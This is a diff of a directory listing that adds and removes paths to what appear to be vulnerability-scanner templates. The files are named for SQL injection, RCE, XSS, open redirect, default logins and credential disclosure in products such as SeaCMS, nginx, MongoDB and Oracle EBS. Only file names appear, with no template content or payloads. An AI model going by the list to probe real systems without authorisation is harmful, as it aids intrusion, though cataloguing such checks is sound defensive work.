./poc/microsoft/samsung-wlan-default-login-10017.yaml ./poc/microsoft/samsung-wlan-default-login-10018.yaml -./poc/microsoft/samsung-wlan-default-login.yaml ./poc/microsoft/sanshuichinatelecombusinesssupportroomsystem.yaml ./poc/microsoft/sdcms神盾内容管理系统.yaml ./poc/microsoft/seaCMS-sqli.yaml @@ -49975,6 +49932,8 @@ ./poc/microsoft/seacms-rce-10102.yaml ./poc/microsoft/seacms-rce.yml ./poc/microsoft/seacms-sqli(1).yaml +./poc/microsoft/seacms-sqli-10103.yaml +./poc/microsoft/seacms-sqli.yaml ./poc/microsoft/seacms-sqli.yml ./poc/microsoft/seacms-v101v11-comment-api-sqli.yaml ./poc/microsoft/seacms-v654-rce.yaml @@ -50127,6 +50086,7 @@ ./poc/microsoft/textme-sms-integration.yaml ./poc/microsoft/tiki-wiki-cms.yaml ./poc/microsoft/tikiwiki-cms-1.yaml +./poc/microsoft/tikiwiki-cms-10773.yaml ./poc/microsoft/tikiwiki-cms-10774.yaml ./poc/microsoft/tikiwiki-cms-10775.yaml ./poc/microsoft/tikiwiki-cms-10776.yaml @@ -50136,8 +50096,8 @@ ./poc/microsoft/tinychat-roomspy.yaml ./poc/microsoft/tomatocms.yaml ./poc/microsoft/top-xss-params-10806.yaml +./poc/microsoft/top-xss-params-10807.yaml ./poc/microsoft/top-xss-params-10808.yaml -./poc/microsoft/top-xss-params-10809.yaml ./poc/microsoft/top-xss-params.yaml ./poc/microsoft/topper-nms.yaml ./poc/microsoft/torro-forms-32b2e2ff95bce6c610720879796f4bca.yaml @@ -50162,7 +50122,6 @@ ./poc/microsoft/views-for-wpforms-lite.yaml ./poc/microsoft/vospari-forms-e9bd69dbdf78833ce2843fc07cba7b74.yaml ./poc/microsoft/vospari-forms.yaml -./poc/microsoft/vpms-auth-bypass-11066.yaml ./poc/microsoft/vpms-auth-bypass-11067.yaml ./poc/microsoft/vpms-auth-bypass-11068.yaml ./poc/microsoft/vpms-auth-bypass-11069.yaml @@ -50179,9 +50138,9 @@ ./poc/microsoft/weforms.yaml ./poc/microsoft/wems-enterprise-xss.yaml ./poc/microsoft/wems-manager-xss-11191.yaml +./poc/microsoft/wems-manager-xss-11192.yaml ./poc/microsoft/wems-manager-xss-11193.yaml ./poc/microsoft/wems-manager-xss-11194.yaml -./poc/microsoft/wems-manager-xss.yaml ./poc/microsoft/whfst-cms.yaml ./poc/microsoft/white-label-cms-1855568f250a52767f45b60ca73feade.yaml ./poc/microsoft/white-label-cms-21f790f886a508204a6d79b9c5155bc7.yaml @@ -50202,9 +50161,10 @@ ./poc/microsoft/woocommerce-ninjaforms-product-addons.yaml ./poc/microsoft/woosms-sms-module-for-woocommerce-15f567edca2252a2ec556aac3ef868ef.yaml ./poc/microsoft/woosms-sms-module-for-woocommerce.yaml +./poc/microsoft/wp-arforms-listing-11415.yaml ./poc/microsoft/wp-arforms-listing-11416.yaml -./poc/microsoft/wp-arforms-listing-11417.yaml ./poc/microsoft/wp-arforms-listing-11418.yaml +./poc/microsoft/wp-arforms-listing.yaml ./poc/microsoft/wp-forms-puzzle-captcha-535ddb74e379b6bd8cd96534784a8e18.yaml ./poc/microsoft/wp-forms-puzzle-captcha-aff3112ad689326307e33432ad0c6e98.yaml ./poc/microsoft/wp-forms-puzzle-captcha-f4892d4cbc102b5b017b90e94acd8329.yaml @@ -50213,9 +50173,11 @@ ./poc/microsoft/wp-gravity-forms-spreadsheets-e2b56e01ba06c66b8d53d40581b73ce6.yaml ./poc/microsoft/wp-gravity-forms-spreadsheets.yaml ./poc/microsoft/wp-mstore-plugin-listing-11501.yaml +./poc/microsoft/wp-mstore-plugin-listing.yaml ./poc/microsoft/wp-plugin-lifterlms-11533.yaml ./poc/microsoft/wp-plugin-lifterlms-11534.yaml ./poc/microsoft/wp-plugin-lifterlms-11536.yaml +./poc/microsoft/wp-sfwd-lms-listing-11562.yaml ./poc/microsoft/wp-sfwd-lms-listing-11563.yaml ./poc/microsoft/wp-sfwd-lms-listing-11564.yaml ./poc/microsoft/wp-sfwd-lms-listing-11565.yaml @@ -50281,6 +50243,7 @@ ./poc/microsoft/wp-sms.yaml ./poc/microsoft/wp-super-forms-11585.yaml ./poc/microsoft/wp-super-forms-11586.yaml +./poc/microsoft/wp-super-forms-11587.yaml ./poc/microsoft/wp-super-forms-11588.yaml ./poc/microsoft/wp-terms-popup-1cce07d804e627ef58aa1266e2d0d645.yaml ./poc/microsoft/wp-terms-popup.yaml @@ -50320,6 +50283,7 @@ ./poc/microsoft/wplms.yaml ./poc/microsoft/wq-cms.yaml ./poc/microsoft/wuzhicms-detect-11652.yaml +./poc/microsoft/wuzhicms-detect-11653.yaml ./poc/microsoft/wuzhicms-detect-11654.yaml ./poc/microsoft/wuzhicms-detect-11655.yaml ./poc/microsoft/wuzhicms-detect.yaml @@ -50327,6 +50291,7 @@ ./poc/microsoft/wuzhicms-sqli-11657.yaml ./poc/microsoft/wuzhicms-sqli-11658.yaml ./poc/microsoft/wuzhicms-sqli-11659.yaml +./poc/microsoft/wuzhicms-sqli.yaml ./poc/microsoft/wuzhicms-v410-sqli.yaml ./poc/microsoft/wuzhicms-v410-sqli.yml ./poc/microsoft/wuzhicms-workflow.yaml @@ -50339,7 +50304,6 @@ ./poc/microsoft/xdcms-sqli-11665.yaml ./poc/microsoft/xdcms-sqli-11666.yaml ./poc/microsoft/xdcms-sqli-11667.yaml -./poc/microsoft/xdcms-sqli.yaml ./poc/microsoft/xdcms-workflow.yaml ./poc/microsoft/xdcms.yaml ./poc/microsoft/xeams-admin-console.yaml @@ -50366,7 +50330,6 @@ ./poc/microsoft/zcms-v3-sqli-11773.yaml ./poc/microsoft/zcms-v3-sqli-11774.yaml ./poc/microsoft/zcms-v3-sqli-11775.yaml -./poc/microsoft/zcms-v3-sqli.yaml ./poc/microsoft/zcms-v3-sqli.yml ./poc/microsoft/zcms-workflow.yaml ./poc/microsoft/zcms.yaml @@ -50393,14 +50356,16 @@ ./poc/microsoft/zzzcms-workflow.yaml ./poc/microsoft/zzzcms-xss.yaml ./poc/microsoft/zzzcms.yaml +./poc/mongodb/alibaba-mongoshake-unauth-268.yaml ./poc/mongodb/alibaba-mongoshake-unauth-269.yaml ./poc/mongodb/alibaba-mongoshake-unauth-270.yaml ./poc/mongodb/dionaea-mongodb-honeypot-detection.yaml ./poc/mongodb/mongo-express-cve-2019-10758.yml ./poc/mongodb/mongo-express-web-gui.yaml ./poc/mongodb/mongodb-detect-8919.yaml +./poc/mongodb/mongodb-detect-8920.yaml ./poc/mongodb/mongodb-detect-8921.yaml -./poc/mongodb/mongodb-detect.yaml +./poc/mongodb/mongodb-ops-manager-8922.yaml ./poc/mongodb/mongodb-ops-manager-8923.yaml ./poc/mongodb/mongodb-ops-manager-8924.yaml ./poc/mongodb/mongodb-ops-manager.yaml @@ -50413,6 +50378,7 @@ ./poc/mongodb/robomongo-credential-1.yaml ./poc/mongodb/robomongo-credential-2.yaml ./poc/mongodb/robomongo-credential-9884.yaml +./poc/mongodb/robomongo-credential-9885.yaml ./poc/mongodb/robomongo.yaml ./poc/mongodb/rockmongo-default-credentials-9896.yaml ./poc/mongodb/rockmongo-default-credentials.yaml @@ -50421,6 +50387,7 @@ ./poc/mongodb/rockmongo-default-login-9900.yaml ./poc/mongodb/rockmongo-default-password.yaml ./poc/mongodb/rockmongo-default-password.yml +./poc/mongodb/rockmongo-xss-9901.yaml ./poc/mongodb/rockmongo-xss-9902.yaml ./poc/mongodb/rockmongo-xss-9903.yaml ./poc/mongodb/rockmongo-xss-9904.yaml @@ -50430,13 +50397,13 @@ ./poc/mongodb/unauthenticated-mongo-express-10909.yaml ./poc/mongodb/unauthenticated-mongo-express-10910.yaml ./poc/mongodb/unauthenticated-mongo-express-2.yaml -./poc/mongodb/unauthenticated-mongo-express.yaml ./poc/mysql/EOffice_mysql_config_information_leak.yaml ./poc/mysql/ScanMySQLiErrorBased.yaml ./poc/mysql/e-cology-e-office-mysql-config-leak.yaml ./poc/mysql/exposed-mysql-initial-7321.yaml ./poc/mysql/exposed-mysql-initial-7322.yaml ./poc/mysql/exposed-mysql-initial-7323.yaml +./poc/mysql/exposed-mysql-initial-7324.yaml ./poc/mysql/mysql-dump-files.yaml ./poc/mysql/mysql-my-cnf-disclosure.yaml ./poc/mysql/mysql-native-cred-bruteforce.yaml @@ -50450,17 +50417,17 @@ ./poc/mysql/seeyon-a6-createmysql-disclosure.yaml ./poc/mysql/seeyon-oa-a6-createmysql-infoleak.yaml ./poc/mysql/unrestricted-sg-ingress-mysql-port.yaml -./poc/netlify/api-netlify-470.yaml +./poc/netlify/api-netlify.yaml ./poc/netlify/netlify-cms-9040.yaml ./poc/netlify/netlify-cms-9041.yaml ./poc/netlify/netlify-cms.yaml ./poc/netlify/netlify-takeover-9042.yaml -./poc/netlify/netlify-takeover-9044.yaml +./poc/netlify/netlify-takeover-9043.yaml ./poc/netlify/netlify-takeover.yaml +./poc/nginx/default-nginx-page-6880.yaml ./poc/nginx/default-nginx-page-6881.yaml ./poc/nginx/default-nginx-page-6882.yaml ./poc/nginx/default-nginx-page-6883.yaml -./poc/nginx/default-nginx-page.yaml ./poc/nginx/git-config-nginxoffbyslash-1.yaml ./poc/nginx/git-config-nginxoffbyslash-2.yaml ./poc/nginx/git-config-nginxoffbyslash-3.yaml @@ -50468,6 +50435,7 @@ ./poc/nginx/git-config-nginxoffbyslash-5.yaml ./poc/nginx/git-config-nginxoffbyslash-6.yaml ./poc/nginx/git-config-nginxoffbyslash-7.yaml +./poc/nginx/git-config-nginxoffbyslash-7629.yaml ./poc/nginx/git-config-nginxoffbyslash-7630.yaml ./poc/nginx/git-config-nginxoffbyslash-7631.yaml ./poc/nginx/git-config-nginxoffbyslash-7632.yaml @@ -50480,11 +50448,9 @@ ./poc/nginx/nginx-auto-installer.yaml ./poc/nginx/nginx-conf-exposed.yaml ./poc/nginx/nginx-config-9096.yaml -./poc/nginx/nginx-config-9098.yaml +./poc/nginx/nginx-config-9097.yaml ./poc/nginx/nginx-config-9099.yaml ./poc/nginx/nginx-config-exposure.yaml -./poc/nginx/nginx-config.yaml -./poc/nginx/nginx-detect.yaml ./poc/nginx/nginx-linux-page-9100.yaml ./poc/nginx/nginx-linux-page-9101.yaml ./poc/nginx/nginx-linux-page-9102.yaml @@ -50493,14 +50459,13 @@ ./poc/nginx/nginx-merge-slashes-path-traversal-2.yaml ./poc/nginx/nginx-merge-slashes-path-traversal-3.yaml ./poc/nginx/nginx-merge-slashes-path-traversal-9104.yaml -./poc/nginx/nginx-merge-slashes-path-traversal-9105.yaml +./poc/nginx/nginx-merge-slashes-path-traversal.yaml ./poc/nginx/nginx-module-vts-xss-9106.yaml ./poc/nginx/nginx-module-vts-xss-9107.yaml ./poc/nginx/nginx-module-vts-xss-9108.yaml ./poc/nginx/nginx-module-vts-xss-9109.yaml ./poc/nginx/nginx-module-vts-xss-9110.yaml ./poc/nginx/nginx-module-vts-xss.yaml -./poc/nginx/nginx-proxy-manager-9111.yaml ./poc/nginx/nginx-proxy-manager-9112.yaml ./poc/nginx/nginx-proxy-manager-9113.yaml ./poc/nginx/nginx-proxy-manager-9114.yaml @@ -50513,9 +50478,8 @@ ./poc/nginx/nginx-ui-dashboard.yaml ./poc/nginx/nginx-version-9119.yaml ./poc/nginx/nginx-version-9120.yaml +./poc/nginx/nginx-version-9121.yaml ./poc/nginx/nginx-version-9122.yaml -./poc/nginx/nginx-version-9123.yaml -./poc/nginx/nginx-version.yaml ./poc/nginx/nginx-vhost-traffic-status-9124.yaml ./poc/nginx/nginx-vhost-traffic-status-9125.yaml ./poc/nginx/nginx-vhost-traffic-status.yaml @@ -50562,12 +50526,11 @@ ./poc/nodejs/expresslfr_post.yaml ./poc/nodejs/geonode.yaml ./poc/nodejs/gradle-cache-node-detect-7797.yaml +./poc/nodejs/gradle-cache-node-detect-7798.yaml ./poc/nodejs/gradle-cache-node-detect.yaml ./poc/nodejs/grandnode.yaml ./poc/nodejs/ibm-web-traffic-express-caching-proxy.yaml ./poc/nodejs/kube-api-nodes-8507.yaml -./poc/nodejs/kube-api-nodes-8508.yaml -./poc/nodejs/kube-api-nodes.yaml ./poc/nodejs/lfr_express.yaml ./poc/nodejs/mailsite-express.yaml ./poc/nodejs/mailsiteexpress.yaml @@ -50620,7 +50583,7 @@ ./poc/nodejs/optima-express.yaml ./poc/nodejs/pcdn-cache-node.yaml ./poc/nodejs/pnpm-pnpm-lock-yaml.yaml -./poc/nodejs/puppet-node-manager-detect.yaml +./poc/nodejs/puppet-node-manager-detect-9720.yaml ./poc/nodejs/stardot-express.yaml ./poc/nodejs/sun-java-system-calendar-express.yaml ./poc/nodejs/unauthenticated-mongo-express-1.yaml @@ -50629,8 +50592,7 @@ ./poc/nodejs/unauthenticated-mongo-express-10909.yaml ./poc/nodejs/unauthenticated-mongo-express-10910.yaml ./poc/nodejs/unauthenticated-mongo-express-2.yaml -./poc/nodejs/unauthenticated-mongo-express.yaml -./poc/nodejs/unauthorized-puppet-node-manager-detect-10958.yaml +./poc/nodejs/unauthorized-puppet-node-manager-detect-10959.yaml ./poc/nodejs/unauthorized-puppet-node-manager-detect.yaml ./poc/nodejs/webp-express-1fbe9279dc139e40de171678cc908922.yaml ./poc/nodejs/webp-express-802342a8791d6bf81a3a97aaebbba8bf.yaml @@ -50663,6 +50625,7 @@ ./poc/open_redirect/404-redirection-manager.yaml ./poc/open_redirect/HTTP - Improper redirect.yaml ./poc/open_redirect/HTTP - Open redirect.yaml +./poc/open_redirect/Sap-redirect.yaml ./poc/open_redirect/Slash-URL-Redirection.yaml ./poc/open_redirect/Url-Redirection-Catcher.yaml ./poc/open_redirect/WBCE CMS 1.6.1 - Open Redirect & CSRF.yaml @@ -50681,17 +50644,17 @@ ./poc/open_redirect/all-in-one-redirection-40669ba7afc409a809558b70fb86dc5a.yaml ./poc/open_redirect/all-in-one-redirection-9e1b1d2bb03fd53ceb91ffb3132e70ec.yaml ./poc/open_redirect/all-in-one-redirection.yaml -./poc/open_redirect/aspnuke-openredirect-554.yaml ./poc/open_redirect/aspnuke-openredirect-555.yaml ./poc/open_redirect/aspnuke-openredirect-556.yaml ./poc/open_redirect/aspnuke-openredirect-557.yaml +./poc/open_redirect/aspnuke-openredirect.yaml ./poc/open_redirect/attitude-theme-open-redirect-587.yaml ./poc/open_redirect/attitude-theme-open-redirect-588.yaml +./poc/open_redirect/attitude-theme-open-redirect.yaml ./poc/open_redirect/attitude-wp-theme-open-redirect.yaml -./poc/open_redirect/aws-redirect-651.yaml +./poc/open_redirect/aws-redirect-652.yaml ./poc/open_redirect/aws-redirect-653.yaml ./poc/open_redirect/aws-redirect-654.yaml -./poc/open_redirect/aws-redirect.yaml ./poc/open_redirect/bitrix-open-redirect-1.yaml ./poc/open_redirect/bitrix-open-redirect-10.yaml ./poc/open_redirect/bitrix-open-redirect-11.yaml @@ -50710,16 +50673,17 @@ ./poc/open_redirect/brandfolder-open-redirect-779.yaml ./poc/open_redirect/brandfolder-open-redirect-780.yaml ./poc/open_redirect/brandfolder-open-redirect-781.yaml -./poc/open_redirect/caddy-open-redirect-836.yaml +./poc/open_redirect/brandfolder-open-redirect-782.yaml +./poc/open_redirect/caddy-open-redirect-837.yaml ./poc/open_redirect/caddy-open-redirect.yaml ./poc/open_redirect/cf7-redirect-thank-you-page-ea1e6381dbae7882ca5c498271c956f8.yaml ./poc/open_redirect/cf7-redirect-thank-you-page.yaml ./poc/open_redirect/custom-login-redirect-065cab9298d59d25ad6e368755cf2c99.yaml ./poc/open_redirect/custom-login-redirect.yaml -./poc/open_redirect/dedecms-openredirect-6800.yaml ./poc/open_redirect/dedecms-openredirect-6801.yaml ./poc/open_redirect/dedecms-openredirect-6802.yaml ./poc/open_redirect/dedecms-openredirect-6803.yaml +./poc/open_redirect/dedecms-openredirect.yaml ./poc/open_redirect/dedecms-url-redirection.yaml ./poc/open_redirect/dedecms-url-redirection.yml ./poc/open_redirect/disable-redirects.yaml @@ -50728,17 +50692,16 @@ ./poc/open_redirect/drupal-user-enum-redirect-2.yaml ./poc/open_redirect/drupal-user-enum-redirect-3.yaml ./poc/open_redirect/drupal-user-enum-redirect-4.yaml -./poc/open_redirect/drupal-user-enum-redirect-7113.yaml +./poc/open_redirect/drupal-user-enum-redirect-7112.yaml ./poc/open_redirect/drupal-user-enum-redirect-7115.yaml -./poc/open_redirect/drupal-user-enum-redirect.yaml ./poc/open_redirect/drupal_module-anonymousredirect-unsupported.yaml ./poc/open_redirect/drupal_module-elf-open-redirect-vulnerability.yaml ./poc/open_redirect/drupal_module-pubdlcnt-open-redirect-vulnerability.yaml ./poc/open_redirect/easy-redirect-manager-15a476cd8a1fcf1c6c6e059975b58c8a.yaml ./poc/open_redirect/easy-redirect-manager.yaml +./poc/open_redirect/eatery-restaurant-open-redirect-7158.yaml ./poc/open_redirect/eatery-restaurant-open-redirect-7159.yaml ./poc/open_redirect/eatery-restaurant-open-redirect-7160.yaml -./poc/open_redirect/eatery-restaurant-open-redirect.yaml ./poc/open_redirect/eatery-restaurant-wp-theme-open-redirect.yaml ./poc/open_redirect/edd-conditional-success-redirects-2d0f5856608a10fb29f7e370acc0b71e.yaml ./poc/open_redirect/edd-conditional-success-redirects.yaml @@ -50770,8 +50733,10 @@ ./poc/open_redirect/homeautomation-v3-openredirect-7984.yaml ./poc/open_redirect/homeautomation-v3-openredirect-7985.yaml ./poc/open_redirect/homeautomation-v3-openredirect-7986.yaml +./poc/open_redirect/homeautomation-v3-openredirect.yaml ./poc/open_redirect/htaccess-redirect-15d8c137823c3b6979566e3d6ce26232.yaml ./poc/open_redirect/htaccess-redirect.yaml +./poc/open_redirect/httpbin-open-redirect-8047.yaml ./poc/open_redirect/httpbin-open-redirect-8048.yaml ./poc/open_redirect/httpbin-open-redirect-8049.yaml ./poc/open_redirect/httpbin-open-redirect.yml @@ -50794,14 +50759,14 @@ ./poc/open_redirect/msmc-redirect-after-comment.yaml ./poc/open_redirect/multiple-parameters-openredirect.yaml ./poc/open_redirect/music-store-open-redirect-8972.yaml -./poc/open_redirect/netsweeper-open-redirect-9063.yaml +./poc/open_redirect/music-store-open-redirect.yaml ./poc/open_redirect/netsweeper-open-redirect-9064.yaml +./poc/open_redirect/netsweeper-open-redirect.yaml ./poc/open_redirect/newsletter-manager-open-redirect-9075.yaml ./poc/open_redirect/newsletter-manager-open-redirect.yaml ./poc/open_redirect/newsletter-open-redirect-9076.yaml ./poc/open_redirect/newsletter-open-redirect-9077.yaml ./poc/open_redirect/newsletter-open-redirect-9078.yaml -./poc/open_redirect/newsletter-open-redirect.yaml ./poc/open_redirect/nextjs-redirect.yaml ./poc/open_redirect/ninjaform-open-redirect-9133.yaml ./poc/open_redirect/ninjaform-open-redirect-9134.yaml @@ -50809,12 +50774,15 @@ ./poc/open_redirect/noptin-open-redirect.yaml ./poc/open_redirect/novnc-url-redirection-cve-2021-3654.yml ./poc/open_redirect/oRedirect1.yaml +./poc/open_redirect/odoo-cms-redirect-9199.yaml ./poc/open_redirect/odoo-cms-redirect-9200.yaml ./poc/open_redirect/odoo-cms-redirect-9201.yaml +./poc/open_redirect/odoo-cms-redirect.yaml ./poc/open_redirect/odoo-openredirect.yaml -./poc/open_redirect/office365-open-redirect-9212.yaml ./poc/open_redirect/office365-open-redirect-9213.yaml ./poc/open_redirect/office365-open-redirect-9214.yaml +./poc/open_redirect/office365-open-redirect-9215.yaml +./poc/open_redirect/office365-open-redirect.yaml ./poc/open_redirect/ojs-unauthenticated-open-redirect.yaml ./poc/open_redirect/open-redirect-00.yaml ./poc/open_redirect/open-redirect-01.yaml @@ -50859,6 +50827,7 @@ ./poc/open_redirect/open_redirect.yaml ./poc/open_redirect/openredirect.yaml ./poc/open_redirect/oracle-ebusiness-openredirect.yaml +./poc/open_redirect/otobo-open-redirect-9409.yaml ./poc/open_redirect/otobo-open-redirect-9410.yaml ./poc/open_redirect/otobo-open-redirect-9411.yaml ./poc/open_redirect/peters-login-redirect-099f67628707b3f385b479015262ac32.yaml @@ -50868,9 +50837,11 @@ ./poc/open_redirect/pieregister-open-redirect-9577.yaml ./poc/open_redirect/pieregister-open-redirect-9578.yaml ./poc/open_redirect/pieregister-open-redirect-9579.yaml +./poc/open_redirect/pieregister-open-redirect.yaml ./poc/open_redirect/pieregister-plugin-open-redirect.yaml -./poc/open_redirect/pollbot-redirect-9621.yaml ./poc/open_redirect/pollbot-redirect-9622.yaml +./poc/open_redirect/pollbot-redirect-9623.yaml +./poc/open_redirect/pollbot-redirect.yaml ./poc/open_redirect/postcode-redirect-6477bf18cad6c823db485408d49b337b.yaml ./poc/open_redirect/postcode-redirect-8fce0528958fb8f6fccd77f326340662.yaml ./poc/open_redirect/postcode-redirect.yaml @@ -51016,7 +50987,6 @@ ./poc/open_redirect/sap-redirect-10065.yaml ./poc/open_redirect/sap-redirect-10066.yaml ./poc/open_redirect/sap-redirect-10067.yaml -./poc/open_redirect/sap-redirect.yaml ./poc/open_redirect/seo-redirection-00236bb3125835cea1f664a5a2990898.yaml ./poc/open_redirect/seo-redirection-02c98a3021ab90d177604810266eda87.yaml ./poc/open_redirect/seo-redirection-19ac51f8b0405a9ec28804b8aaa29d9c.yaml @@ -51062,6 +51032,7 @@ ./poc/open_redirect/ssl-atlas-free-ssl-certificate-https-redirect.yaml ./poc/open_redirect/thinkific-redirect-10732.yaml ./poc/open_redirect/thinkific-redirect-10733.yaml +./poc/open_redirect/thinkific-redirect-10734.yaml ./poc/open_redirect/thinkific-redirect-10735.yaml ./poc/open_redirect/thinkific-redirect-10736.yaml ./poc/open_redirect/thinkific-redirect-10737.yaml @@ -51070,16 +51041,15 @@ ./poc/open_redirect/ultimatemember-open-redirect-10877.yaml ./poc/open_redirect/ultimatemember-open-redirect-10878.yaml ./poc/open_redirect/ultimatemember-open-redirect-10879.yaml +./poc/open_redirect/ultimatemember-open-redirect.yaml ./poc/open_redirect/ultimatemember-plugin-open-redirect.yaml ./poc/open_redirect/url-redirect.yaml ./poc/open_redirect/wc-thanks-redirect-6477bf18cad6c823db485408d49b337b.yaml ./poc/open_redirect/wc-thanks-redirect-8ce62c9a29dcc031d4f086c2f6793117.yaml ./poc/open_redirect/wc-thanks-redirect.yaml ./poc/open_redirect/webp-coverter-open-redirect.yaml -./poc/open_redirect/weekender-newspaper-open-redirect-11186.yaml ./poc/open_redirect/weekender-newspaper-open-redirect-11187.yaml ./poc/open_redirect/weekender-newspaper-open-redirect-11188.yaml -./poc/open_redirect/weekender-newspaper-open-redirect.yaml ./poc/open_redirect/weekender-newspaper-wp-theme-open-redirect.yaml ./poc/open_redirect/woo-login-redirect-317022364d5cdae673f22cdada5aba50.yaml ./poc/open_redirect/woo-login-redirect-e4654f9a46c58ec7da5e9256a56d6e89.yaml @@ -51097,21 +51067,21 @@ ./poc/open_redirect/wp-brandfolder-plugin-open-redirect.yaml ./poc/open_redirect/wp-domain-redirect-e5bf6ab8eeb40788caddb9493fd84dca.yaml ./poc/open_redirect/wp-domain-redirect.yaml -./poc/open_redirect/wp-grimag-open-redirect-11458.yaml ./poc/open_redirect/wp-grimag-open-redirect-11459.yaml ./poc/open_redirect/wp-grimag-open-redirect-11460.yaml ./poc/open_redirect/wp-grimag-open-redirect-11461.yaml ./poc/open_redirect/wp-grimag-open-redirect-11462.yaml +./poc/open_redirect/wp-grimag-open-redirect.yaml ./poc/open_redirect/wp-gtranslate-open-redirect-11463.yaml ./poc/open_redirect/wp-gtranslate-open-redirect-11464.yaml ./poc/open_redirect/wp-gtranslate-open-redirect-11465.yaml +./poc/open_redirect/wp-gtranslate-open-redirect-11466.yaml ./poc/open_redirect/wp-login-and-logout-redirect-bcc9e091fa98d610ac79a7162207c92e.yaml ./poc/open_redirect/wp-login-and-logout-redirect.yaml ./poc/open_redirect/wp-prostore-open-redirect-11546.yaml ./poc/open_redirect/wp-prostore-open-redirect-11547.yaml ./poc/open_redirect/wp-prostore-open-redirect-11548.yaml ./poc/open_redirect/wp-prostore-open-redirect-11549.yaml -./poc/open_redirect/wp-prostore-open-redirect-11550.yaml ./poc/open_redirect/wp-search-keyword-redirect-bf4ef59a087b3009bcd665ccc0df58a8.yaml ./poc/open_redirect/wp-search-keyword-redirect.yaml ./poc/open_redirect/wp-security-open-redirect.yaml @@ -51131,8 +51101,7 @@ ./poc/open_redirect/wpcf7-redirect.yaml ./poc/open_redirect/wptouch-open-redirect-11592.yaml ./poc/open_redirect/wptouch-open-redirect-11593.yaml -./poc/open_redirect/wptouch-open-redirect-11595.yaml -./poc/open_redirect/wptouch-open-redirect.yaml +./poc/open_redirect/wptouch-open-redirect-11594.yaml ./poc/open_redirect/wptouch-plugin-open-redirect.yaml ./poc/open_redirect/zip-codes-redirect-6477bf18cad6c823db485408d49b337b.yaml ./poc/open_redirect/zip-codes-redirect-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -51152,11 +51121,11 @@ ./poc/oracle/default-oracle-application-page-6891.yaml ./poc/oracle/default-oracle-application-page-6892.yaml ./poc/oracle/default-oracle-application-page-6893.yaml +./poc/oracle/default-oracle-application-page.yaml ./poc/oracle/dms-oracle.yaml ./poc/oracle/metadata-oracle-8829.yaml ./poc/oracle/metadata-oracle-8830.yaml ./poc/oracle/metadata-oracle-8831.yaml -./poc/oracle/metadata-oracle.yaml ./poc/oracle/oracle-access-manager.yaml ./poc/oracle/oracle-adf-faces.yaml ./poc/oracle/oracle-application-server.yaml @@ -51172,28 +51141,30 @@ ./poc/oracle/oracle-containers-panel.yaml ./poc/oracle/oracle-dbass-detect-9349.yaml ./poc/oracle/oracle-dbass-detect-9350.yaml +./poc/oracle/oracle-dbass-detect-9351.yaml ./poc/oracle/oracle-dbcs-9352.yaml ./poc/oracle/oracle-dbcs-9353.yaml ./poc/oracle/oracle-dbcs-9354.yaml ./poc/oracle/oracle-dbcs-9355.yaml +./poc/oracle/oracle-dbcs.yaml ./poc/oracle/oracle-ebs-bispgraph-file-access-1.yaml ./poc/oracle/oracle-ebs-bispgraph-file-access-2.yaml ./poc/oracle/oracle-ebs-bispgraph-file-access-9356.yaml ./poc/oracle/oracle-ebs-bispgraph-file-access-9357.yaml ./poc/oracle/oracle-ebs-bispgraph-file-access-9358.yaml ./poc/oracle/oracle-ebs-bispgraph-file-access-9359.yaml -./poc/oracle/oracle-ebs-bispgraph-file-access-9360.yaml ./poc/oracle/oracle-ebs-bispgraph-file-access-9361.yaml ./poc/oracle/oracle-ebs-config-disclosure.yaml ./poc/oracle/oracle-ebs-credentials-9364.yaml -./poc/oracle/oracle-ebs-credentials-9365.yaml ./poc/oracle/oracle-ebs-credentials-9366.yaml ./poc/oracle/oracle-ebs-credentials-disclosure-9363.yaml ./poc/oracle/oracle-ebs-credentials-disclosure.yaml +./poc/oracle/oracle-ebs-credentials.yaml ./poc/oracle/oracle-ebs-desr.yaml ./poc/oracle/oracle-ebs-lfi.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9367.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9369.yaml +./poc/oracle/oracle-ebs-sqllog-disclosure-9370.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9371.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure-9372.yaml ./poc/oracle/oracle-ebs-sqllog-disclosure.yaml @@ -51223,15 +51194,16 @@ ./poc/oracle/oracle-integrated-manager-9387.yaml ./poc/oracle/oracle-integrated-manager-9388.yaml ./poc/oracle/oracle-integrated-manager-9389.yaml +./poc/oracle/oracle-integrated-manager-9390.yaml ./poc/oracle/oracle-integrated-manager.yaml ./poc/oracle/oracle-iplanet-web-server-9391.yaml +./poc/oracle/oracle-iplanet-web-server-9392.yaml ./poc/oracle/oracle-iplanet-web-server-9393.yaml -./poc/oracle/oracle-iplanet-web-server.yaml ./poc/oracle/oracle-oam-xss.yaml ./poc/oracle/oracle-opera.yaml -./poc/oracle/oracle-people-enterprise-9394.yaml ./poc/oracle/oracle-people-enterprise-9395.yaml ./poc/oracle/oracle-people-enterprise-9396.yaml +./poc/oracle/oracle-people-enterprise-9397.yaml ./poc/oracle/oracle-people-enterprise-9398.yaml ./poc/oracle/oracle-people-enterprise.yaml ./poc/oracle/oracle-people-sign-in.yaml @@ -51365,7 +51337,8 @@ ./poc/other/37 - T2.yaml ./poc/other/38 - T3.yaml ./poc/other/39 - T4.yaml -./poc/other/3cx-management-console-2.yaml +./poc/other/3cx-management-console-1.yaml +./poc/other/3cx-management-console.yaml ./poc/other/3cx-phone-management-panel.yaml ./poc/other/3d-cover-carousel-e3b7977578ea85058de3bb34af6ce851.yaml ./poc/other/3d-cover-carousel.yaml @@ -51387,8 +51360,6 @@ ./poc/other/3g-wireless-gateway-3.yaml ./poc/other/3g-wireless-gateway-4.yaml ./poc/other/3g-wireless-gateway-5.yaml -./poc/other/3g-wireless-gateway-6.yaml -./poc/other/3g-wireless-gateway.yaml ./poc/other/3gmeeting-fileRead.yaml ./poc/other/3r-elementor-timeline-widget.yaml ./poc/other/40 - T5.yaml @@ -51502,7 +51473,6 @@ ./poc/other/Avada.yaml ./poc/other/B2Bbuilder_v7-getshell.yaml ./poc/other/Bitrix_Account_UIDH.yaml -./poc/other/Bitrix_check_env.yaml ./poc/other/Bitrix_server_testcheck.yaml ./poc/other/CISA.yaml ./poc/other/CORS Pre-Flight Bypass.yaml @@ -51576,6 +51546,7 @@ ./poc/other/LPDString.yaml ./poc/other/LSCP.yaml ./poc/other/LayerSlider-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml +./poc/other/LayerSlider-plugin.yaml ./poc/other/LibreOfficeImpressSCPair.yaml ./poc/other/LiveBOS_ShowImage_FileRead.yaml 